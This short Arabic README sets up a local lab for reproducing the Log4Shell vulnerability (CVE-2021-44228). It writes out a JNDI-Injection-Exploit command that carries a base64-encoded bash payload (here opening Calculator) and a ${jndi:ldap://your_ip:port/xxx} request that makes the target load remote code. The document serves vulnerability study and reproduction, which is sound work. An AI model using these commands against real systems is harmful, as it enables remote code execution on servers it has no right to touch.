
بيئة إعادة إنتاج الثغرة CVE-2021-44228
بعد بدء المشروع، قم بالوصول عبر: http://127.0.0.1:9090/vul
إصدار JDK: java8u92 (تجنب استخدام الإصدارات العالية جدًا، يُنصح باستخدام نفس الإصدار الذي أستخدمه، حيث أن الإصدارات العالية تفرض قيودًا على حقن JNDI)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
استخدم الأداة أعلاه لإنشاء PAYLOAD.
قم بالوصول إلى http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}